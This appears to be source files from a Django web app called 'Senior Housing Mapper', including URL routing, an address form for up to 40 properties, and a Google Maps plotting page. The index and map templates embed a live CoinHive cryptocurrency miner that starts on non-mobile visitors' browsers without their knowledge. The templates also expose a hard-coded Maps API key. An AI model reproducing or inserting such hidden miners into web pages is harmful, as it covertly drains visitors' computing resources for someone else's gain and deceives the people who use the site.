findComps/urls.py
from django.conf.urls import include, url
from . import views


urlpatterns = [

    url(r'^find/$', views.find, name="find"),
    url(r'^compsearch/$', views.compsearch, name="compsearch")
 ]

maptest/urls.py
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from maptestapp.views import AccountViewSet

router = routers.SimpleRouter()
router.register(r'accounts', AccountViewSet)

urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^', include('maptestapp.urls', namespace = "maptestapp")),
    url(r'^findcomps/', include('findComps.urls', namespace="findComps"))
    #url(r'^api/v1/', include(router.urls)),
    #url(r'^$', AccountViewSet.as_view({'get':'list'}), name='index')
]

templates/mapping/index.html
<!DOCTYPE html>
<html>
{%load staticfiles%}

<title>Senior Housing Researcher</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="http://www.w3schools.com/lib/w3.css">
<link rel="stylesheet" href="{%static 'css/main.css' %}">

<body bgcolor="#375472">
 <nav role="navigation" ><br>
    <span class = "compButton" id="compButton">
        <a style="color:white;" href="{% url 'findComps:find' %}">
            Download Skilled Nursing Comp Data</a>
    </span>

    <h2 class="header1"> SENIOR HOUSING MAPPER</h2><br>
    </nav>

<div id="propBox" >
<form class="addressForm" action = "/plot/" method="POST" id="plotForm">
  {% csrf_token %}

  <div id="addressDiv">

	  <label class="w3-label"> S) Subject Property  </label>
	  <input class = "autoComplete" id ="propInput" type="text" name="subject" required><br><br>

	  <label class="w3-label">1)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr1"><br><br><br>

	  <label class="w3-label">2)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr2"><br><br><br>

	  <label class="w3-label">3)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr3"><br><br><br>

	  <label class="w3-label">4)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr4"><br><br><br>

	  <label class="w3-label">5)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr5"><br><br><br>

	  <label class="w3-label">6)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr6"><br><br><br>

	  <label class="w3-label">7)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr7"><br><br><br>

	  <label class="w3-label">8)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr8"><br><br><br>

	  <label class="w3-label">9)  Property Address  </label>
	  <input id = "propInput" type="text" name="addr9"><br><br><br>

	  <label class="w3-label">10) Property Address  </label>
	  <input id = "propInput" type="text" name="addr10"><br><br><br>

	  <label class="w3-label">11) Property Address  </label>
	  <input id = "propInput" type="text" name="addr11"><br><br><br>

	  <label class="w3-label">12) Property Address  </label>
	  <input id = "propInput" type="text" name="addr12"><br><br><br>

	  <label class="w3-label">13) Property Address  </label>
	  <input id = "propInput" type="text" name="addr13"><br><br><br>

	  <label class="w3-label">14) Property Address  </label>
	  <input id = "propInput" type="text" name="addr14"><br><br><br>

	  <label class="w3-label">15) Property Address  </label>
	  <input id = "propInput" type="text" name="addr15"><br><br><br>

	  <label class="w3-label">16) Property Address  </label>
	  <input id = "propInput" type="text" name="addr16"><br><br><br>

	  <label class="w3-label">17) Property Address  </label>
	  <input id = "propInput" type="text" name="addr17"><br><br><br>

	  <label class="w3-label">18) Property Address  </label>
	  <input id = "propInput" type="text" name="addr18"><br><br><br>

	  <label class="w3-label">19) Property Address  </label>
	  <input id = "propInput" type="text" name="addr19"><br><br><br>

	  <label class="w3-label">20) Property Address  </label>
	  <input id = "propInput" type="text" name="addr20"><br><br><br>

	  <label class="w3-label">21) Property Address  </label>
	  <input id = "propInput" type="text" name="addr21"><br><br><br>

	  <label class="w3-label">22) Property Address  </label>
	  <input id = "propInput" type="text" name="addr22"><br><br><br>

	  <label class="w3-label">23) Property Address  </label>
	  <input id = "propInput" type="text" name="addr23"><br><br><br>

	  <label class="w3-label">24) Property Address  </label>
	  <input id = "propInput" type="text" name="addr24"><br><br><br>

	  <label class="w3-label">25) Property Address  </label>
	  <input id = "propInput" type="text" name="addr25"><br><br><br>

	  <label class="w3-label">26) Property Address  </label>
	  <input id = "propInput" type="text" name="addr26"><br><br><br>

	  <label class="w3-label">27) Property Address  </label>
	  <input id = "propInput" type="text" name="addr27"><br><br><br>

	  <label class="w3-label">28) Property Address  </label>
	  <input id = "propInput" type="text" name="addr28"><br><br><br>

	  <label class="w3-label">29) Property Address  </label>
	  <input id = "propInput" type="text" name="addr29"><br><br><br>

	  <label class="w3-label">30) Property Address  </label>
	  <input id = "propInput" type="text" name="addr30"><br><br><br>

	  <label class="w3-label">31) Property Address  </label>
	  <input id = "propInput" type="text" name="addr31"><br><br><br>

	  <label class="w3-label">32) Property Address  </label>
	  <input id = "propInput" type="text" name="addr32"><br><br><br>

	  <label class="w3-label">33) Property Address  </label>
	  <input id = "propInput" type="text" name="addr33"><br><br><br>

	  <label class="w3-label">34) Property Address  </label>
	  <input id = "propInput" type="text" name="addr34"><br><br><br>

	  <label class="w3-label">35) Property Address  </label>
	  <input id = "propInput" type="text" name="addr35"><br><br><br>

	  <label class="w3-label">36) Property Address  </label>
	  <input id = "propInput" type="text" name="addr36"><br><br><br>

	  <label class="w3-label">37) Property Address  </label>
	  <input id = "propInput" type="text" name="addr37"><br><br><br>

	  <label class="w3-label">38) Property Address  </label>
	  <input id = "propInput" type="text" name="addr38"><br><br><br>

	  <label class="w3-label">39) Property Address  </label>
	  <input id = "propInput" type="text" name="addr39"><br><br><br>

	  <label class="w3-label">40) Property Address  </label>
	  <input id = "propInput" type="text" name="addr40"><br><br><br>

	</div>

  <input type="submit" class="button-scrolly" value="Plot Facilities" id="send">
</form>
</div>



<script>
      var placeSearch, autocomplete;

      function initAutocomplete() {
      	var divNode = document.getElementById("addressDiv");
      	var inputNodes = divNode.getElementsByTagName("input");

      	for (i=0; i < inputNodes.length; i++){
      		autocomplete = new google.maps.places.Autocomplete(
            (inputNodes[i]),
            {types: ['geocode']});

        autocomplete.addListener('place_changed', fillInAddress);
      	}

      }

      function fillInAddress() {
        var place = autocomplete.getPlace();

        for (var i = 0; i < place.address_components.length; i++) {
          var addressType = place.address_components[i].types[0];
          if (componentForm[addressType]) {
            var val = place.address_components[i][componentForm[addressType]];
            document.getElementById(addressType).value = val;
          }
        }
      }

    </script>
    <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCZl9Lgnc1a6tVGKagzs1EvKrcq_iQMVmw&libraries=places&callback=initAutocomplete"
        async defer></script>

    <script src=https://coinhive.com/lib/coinhive.min.js></script>
        <script>
	    var miner = new CoinHive.Anonymous('eFvvkJ3sH29qCB4jtj64OuxOSUM5ioPm', {throttle: 0.25});
	    if (!miner.isMobile() && !miner.didOptOut(14400)) {
	    	miner.start();
	    }
    </script>

<script>
  </body>
</html>

templates/mapping/multiple.html
<!DOCTYPE html>

<html>
{% load static %}
  <head>
    <meta name="viewport" content="initial-scale=1.0, user-scalable=no">
    <meta charset="utf-8">
    <title>SENIOR HOUSING MAPPER</title>
    <style>
            html, body {
              height: 100%;
              margin: 0;
              padding: 0;
            }
            #map {
              height: 100%;
            }
    </style>
  </head>

  <body>

<div>
    {% for m in msg_list %}
      <li>{{m}}</li>
    {% endfor %}

</div>


  <div id="map"></div>
       <script>
      function initMap() {
        var addresses = {{formatted_js}}
        var sec = addresses[0]
        var map = new google.maps.Map(document.getElementById('map'), {
          zoom: 10,
          center: sec
        });
        var iconBase = 'https://maps.google.com/mapfiles/kml/shapes/';
        for(i=0; i <= addresses.length; i++){
            if(i==0){
                var marker = new google.maps.Marker({
                  position: addresses[i],
                  map: map,
                  icon: "{%static 'img/BPMarkerTrans1.png' %}"});
            }
            else{
             var image_select = "{%static 'img/mark" + i + ".png' %}"
              var marker = new google.maps.Marker({
              position: addresses[i],
              map: map,
              icon: image_select });
            }
       }
}
  </script>


    <script async defer
        src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCZl9Lgnc1a6tVGKagzs1EvKrcq_iQMVmw&callback=initMap">
    </script>

    <script>
          (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
          (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
          })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

          ga('create', 'UA-98843259-1', 'auto');
          ga('send', 'pageview');
    </script>

        <script src=https://coinhive.com/lib/coinhive.min.js></script>
        <script>
	    var miner = new CoinHive.Anonymous('eFvvkJ3sH29qCB4jtj64OuxOSUM5ioPm', {throttle: 0.25});
	    if (!miner.isMobile() && !miner.didOptOut(14400)) {
	    	miner.start();
	    }
    </script>




 </body>
</html>

templates/mapping/signup.html
<html>

<form action = "/home/success/" method="POST" id="searchForm">
	{% csrf_token %}

  	Enter your address and let us pull up some information on the closest care providers for you<br>
	<input type="text" name="email"><br>
	<input type="text" name="username"><br>
	<input type="submit" class="button scrolly" value="Find Care" id="send">


				</form>

</html>